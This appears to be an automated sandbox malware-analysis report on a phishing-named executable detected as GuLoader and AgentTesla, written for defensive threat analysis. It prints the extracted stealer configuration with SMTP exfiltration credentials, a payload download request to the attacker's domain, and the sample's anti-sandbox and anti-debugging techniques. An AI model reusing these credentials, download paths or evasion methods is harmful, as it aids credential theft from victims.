Play interactive tour

Edit tour

Windows Analysis Report HSBC Customer Information.exe

Overview

General Information

Sample Name:	HSBC Customer Information.exe
Analysis ID:	483511
MD5:	448f83467c61e465162daf7cf8d9e88f
SHA1:	c627061336905606c2c26b2b460ac4246fd54ca5
SHA256:	4773c7c5c52d0163bfa32cb271399692831e00ff7e6877f0877091e111c9f063
Tags:	exe
Infos:
Most interesting Screenshot:

Detection

GuLoader AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Potential malicious icon found

Multi AV Scanner detection for submitted file

Yara detected AgentTesla

GuLoader behavior detected

Yara detected GuLoader

Hides threads from debuggers

Writes to foreign memory regions

Tries to detect Any.run

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Machine Learning detection for sample

Tries to detect virtualization through RDTSC time measurements

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Yara detected Credential Stealer

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to call native functions

Contains long sleeps (>= 3 min)

Abnormal high CPU Usage

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Sample file is different than original file name gathered from version info

PE file contains strange resources

Tries to load missing DLLs

Uses a known web browser user agent for HTTP communication

Checks if the current process is being debugged

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

HSBC Customer Information.exe (PID: 6392 cmdline: 'C:\Users\user\Desktop\HSBC Customer Information.exe' MD5: 448F83467C61E465162DAF7CF8D9E88F)

RegAsm.exe (PID: 6140 cmdline: 'C:\Users\user\Desktop\HSBC Customer Information.exe' MD5: 6FD7592411112729BF6B1F2F6C34899F)

conhost.exe (PID: 5140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "gmx@qrextechnologies.com2)4#8tVp2d%qmail.qrextechnologies.cominfo@qrextechnologies.com"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.591786294.0000000002240000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000019.00000002.738174710.000000001DE91000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000019.00000002.738174710.000000001DE91000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 6140	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: RegAsm.exe PID: 6140	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: HSBC Customer Information.exe.6392.0.memstrmin

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "gmx@qrextechnologies.com2)4#8tVp2d%qmail.qrextechnologies.cominfo@qrextechnologies.com"}

Multi AV Scanner detection for submitted file

Show sources

Source: HSBC Customer Information.exe	Virustotal: Detection: 25%			Perma Link
Source: HSBC Customer Information.exe	ReversingLabs: Detection: 20%

Machine Learning detection for sample

Show sources

Source: HSBC Customer Information.exe

Joe Sandbox ML: detected

Source: HSBC Customer Information.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: unknown

HTTPS traffic detected: 109.71.254.175:443 -> 192.168.2.3:49791 version: TLS 1.2

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic

HTTP traffic detected: GET /barrr09_HVPbNJre68.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: qrextechnologies.comCache-Control: no-cache

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443

Source: RegAsm.exe, 00000019.00000002.738174710.000000001DE91000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: RegAsm.exe, 00000019.00000002.738174710.000000001DE91000.00000004.00000001.sdmp	String found in binary or memory: http://DynDns.comDynDNS
Source: RegAsm.exe, 00000019.00000002.738174710.000000001DE91000.00000004.00000001.sdmp	String found in binary or memory: http://cthUYD.com
Source: RegAsm.exe, 00000019.00000002.738174710.000000001DE91000.00000004.00000001.sdmp	String found in binary or memory: https://api.ipify.org%GETMozilla/5.0
Source: RegAsm.exe, 00000019.00000002.732840831.0000000001200000.00000004.00000001.sdmp	String found in binary or memory: https://qrextechnologies.com/barrr09_HVPbNJre68.bin
Source: RegAsm.exe, 00000019.00000002.732840831.0000000001200000.00000004.00000001.sdmp	String found in binary or memory: https://qrextechnologies.com/barrr09_HVPbNJre68.binwininet.dllMozilla/5.0
Source: RegAsm.exe, 00000019.00000002.738174710.000000001DE91000.00000004.00000001.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

Source: unknown

DNS traffic detected: queries for: qrextechnologies.com

Source: global traffic

HTTP traffic detected: GET /barrr09_HVPbNJre68.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: qrextechnologies.comCache-Control: no-cache

Source: unknown

HTTPS traffic detected: 109.71.254.175:443 -> 192.168.2.3:49791 version: TLS 1.2

System Summary:

Potential malicious icon found

Show sources

Source: initial sample

Icon embedded in PE file: bad icon match: 20047c7c70f0e004

Source: HSBC Customer Information.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: C:\Users\user\Desktop\HSBC Customer Information.exe	Code function: 0_2_004017AC
Source: C:\Users\user\Desktop\HSBC Customer Information.exe	Code function: 0_2_0224282A
Source: C:\Users\user\Desktop\HSBC Customer Information.exe	Code function: 0_2_022428A3
Source: C:\Users\user\Desktop\HSBC Customer Information.exe	Code function: 0_2_02245CAF
Source: C:\Users\user\Desktop\HSBC Customer Information.exe	Code function: 0_2_022406C3
Source: C:\Users\user\Desktop\HSBC Customer Information.exe	Code function: 0_2_02240ED2
Source: C:\Users\user\Desktop\HSBC Customer Information.exe	Code function: 0_2_02240F34
Source: C:\Users\user\Desktop\HSBC Customer Information.exe	Code function: 0_2_02240702
Source: C:\Users\user\Desktop\HSBC Customer Information.exe	Code function: 0_2_0224651E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 25_2_1DD747A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 25_2_1DD74790

Source: C:\Users\user\Desktop\HSBC Customer Information.exe

Code function: 0_2_02245CAF NtAllocateVirtualMemory,

Source: C:\Users\user\Desktop\HSBC Customer Information.exe	Process Stats: CPU usage > 98%
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process Stats: CPU usage > 98%

Source: HSBC Customer Information.exe, 00000000.00000000.208413125.000000000041D000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameBlankningscu5.exe vs HSBC Customer Information.exe
Source: HSBC Customer Information.exe	Binary or memory string: OriginalFilenameBlankningscu5.exe vs HSBC Customer Information.exe

Source: HSBC Customer Information.exe

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Section loaded: sfc.dll

Source: HSBC Customer Information.exe	Virustotal: Detection: 25%
Source: HSBC Customer Information.exe	ReversingLabs: Detection: 20%

Source: HSBC Customer Information.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\HSBC Customer Information.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Users\user\Desktop\HSBC Customer Information.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Source: unknown	Process created: C:\Users\user\Desktop\HSBC Customer Information.exe 'C:\Users\user\Desktop\HSBC Customer Information.exe'
Source: C:\Users\user\Desktop\HSBC Customer Information.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\HSBC Customer Information.exe'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\HSBC Customer Information.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\HSBC Customer Information.exe'

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: classification engine

Classification label: mal100.rans.troj.evad.winEXE@4/0@1/1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5140:120:WilError_01

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match

File source: 00000000.00000002.591786294.0000000002240000.00000040.00000001.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\HSBC Customer Information.exe	Code function: 0_2_00407D36 push 0000000Fh; ret
Source: C:\Users\user\Desktop\HSBC Customer Information.exe	Code function: 0_2_004059AE push ecx; ret
Source: C:\Users\user\Desktop\HSBC Customer Information.exe	Code function: 0_2_02241E3C push esp; ret
Source: C:\Users\user\Desktop\HSBC Customer Information.exe	Code function: 0_2_0224460E push ebp; iretd
Source: C:\Users\user\Desktop\HSBC Customer Information.exe	Code function: 0_2_02244412 push esp; retf
Source: C:\Users\user\Desktop\HSBC Customer Information.exe	Code function: 0_2_0224301F push ebx; iretd
Source: C:\Users\user\Desktop\HSBC Customer Information.exe	Code function: 0_2_02240A5C push esi; retf
Source: C:\Users\user\Desktop\HSBC Customer Information.exe	Code function: 0_2_022446B5 push ebp; iretd
Source: C:\Users\user\Desktop\HSBC Customer Information.exe	Code function: 0_2_02242D18 push ebx; iretd
Source: C:\Users\user\Desktop\HSBC Customer Information.exe	Code function: 0_2_02246B6D push ecx; retf
Source: C:\Users\user\Desktop\HSBC Customer Information.exe	Code function: 0_2_022441BE push ebx; iretd
Source: C:\Users\user\Desktop\HSBC Customer Information.exe	Code function: 0_2_02241F89 push 0000001Dh; ret
Source: C:\Users\user\Desktop\HSBC Customer Information.exe	Code function: 0_2_02244192 push ebx; iretd
Source: C:\Users\user\Desktop\HSBC Customer Information.exe	Code function: 0_2_022467E2 pushad ; retf
Source: C:\Users\user\Desktop\HSBC Customer Information.exe	Code function: 0_2_022445F1 push ebp; iretd

Source: C:\Users\user\Desktop\HSBC Customer Information.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect Any.run

Show sources

Source: C:\Users\user\Desktop\HSBC Customer Information.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\Desktop\HSBC Customer Information.exe	File opened: C:\Program Files\qga\qga.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Program Files\qga\qga.exe

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: RegAsm.exe, 00000019.00000002.732840831.0000000001200000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32USERPROFILE=HTTPS://QREXTECHNOLOGIES.COM/BARRR09_HVPBNJRE68.BINWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKO
Source: HSBC Customer Information.exe, 00000000.00000002.591846638.0000000002360000.00000004.00000001.sdmp, RegAsm.exe, 00000019.00000002.732840831.0000000001200000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: HSBC Customer Information.exe, 00000000.00000002.591846638.0000000002360000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32USERPROFILE=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\REGASM.EXE\SYSWOW64\MSVBVM60.DLL

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\HSBC Customer Information.exe

RDTSC instruction interceptor: First address: 000000000040BC41 second address: 000000000040BC41 instructions: 0x00000000 rdtsc 0x00000002 cmp edx, 000000F3h 0x00000008 xor eax, edx 0x0000000a cmp cx, 00E8h 0x0000000f dec edi 0x00000010 cmp bx, 00DDh 0x00000015 fabs 0x00000017 jmp 00007FC36C4BB470h 0x00000019 cmp edi, 00000000h 0x0000001c jne 00007FC36C4BB393h 0x00000022 cmp si, 00BBh 0x00000027 mov ebx, F06F76B6h 0x0000002c cmp dh, FFFFFFACh 0x0000002f sub ebx, 2716C148h 0x00000035 cmp ebx, 24h 0x00000038 xor ebx, 6F5BB001h 0x0000003e cmp di, 0030h 0x00000042 punpckldq mm1, mm7 0x00000045 jmp 00007FC36C4BB474h 0x00000047 xor ebx, A643056Fh 0x0000004d cmp ah, 00000026h 0x00000050 cmp cl, FFFFFF90h 0x00000053 rdtsc

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4332

Thread sleep time: -26747778906878833s >= -30000s

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\HSBC Customer Information.exe	Window / User API: threadDelayed 684
Source: C:\Users\user\Desktop\HSBC Customer Information.exe	Window / User API: threadDelayed 9316
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Window / User API: threadDelayed 9139
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Window / User API: threadDelayed 685

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process information queried: ProcessInformation

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\HSBC Customer Information.exe

System information queried: ModuleInformation

Source: RegAsm.exe, 00000019.00000002.732840831.0000000001200000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32USERPROFILE=https://qrextechnologies.com/barrr09_HVPbNJre68.binwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Source: HSBC Customer Information.exe, 00000000.00000002.591846638.0000000002360000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32USERPROFILE=windir=\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe\syswow64\msvbvm60.dll
Source: HSBC Customer Information.exe, 00000000.00000002.591846638.0000000002360000.00000004.00000001.sdmp, RegAsm.exe, 00000019.00000002.732840831.0000000001200000.00000004.00000001.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

Anti Debugging:

Hides threads from debuggers

Show sources

Source: C:\Users\user\Desktop\HSBC Customer Information.exe	Thread information set: HideFromDebugger
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread information set: HideFromDebugger
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread information set: HideFromDebugger

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process token adjusted: Debug

Source: C:\Users\user\Desktop\HSBC Customer Information.exe	Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process queried: DebugPort

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

Writes to foreign memory regions

Show sources

Source: C:\Users\user\Desktop\HSBC Customer Information.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 1000000

Source: C:\Users\user\Desktop\HSBC Customer Information.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\HSBC Customer Information.exe'

Source: RegAsm.exe, 00000019.00000002.734685005.00000000017B0000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: RegAsm.exe, 00000019.00000002.734685005.00000000017B0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: RegAsm.exe, 00000019.00000002.734685005.00000000017B0000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: RegAsm.exe, 00000019.00000002.734685005.00000000017B0000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 00000019.00000002.738174710.000000001DE91000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 6140, type: MEMORYSTR

GuLoader behavior detected

Show sources

Source: Initial file

Signature Results: GuLoader behavior

Source: Yara match	File source: 00000019.00000002.738174710.000000001DE91000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 6140, type: MEMORYSTR

Remote Access Functionality:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 00000019.00000002.738174710.000000001DE91000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 6140, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation211	DLL Side-Loading1	Process Injection112	Disable or Modify Tools1	OS Credential Dumping	Security Software Discovery521	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel11	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	DLL Side-Loading1	Virtualization/Sandbox Evasion341	LSASS Memory	Process Discovery2	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection112	Security Account Manager	Virtualization/Sandbox Evasion341	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information1	NTDS	Application Window Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol13	SIM Card Swap		Carrier Billing Fraud
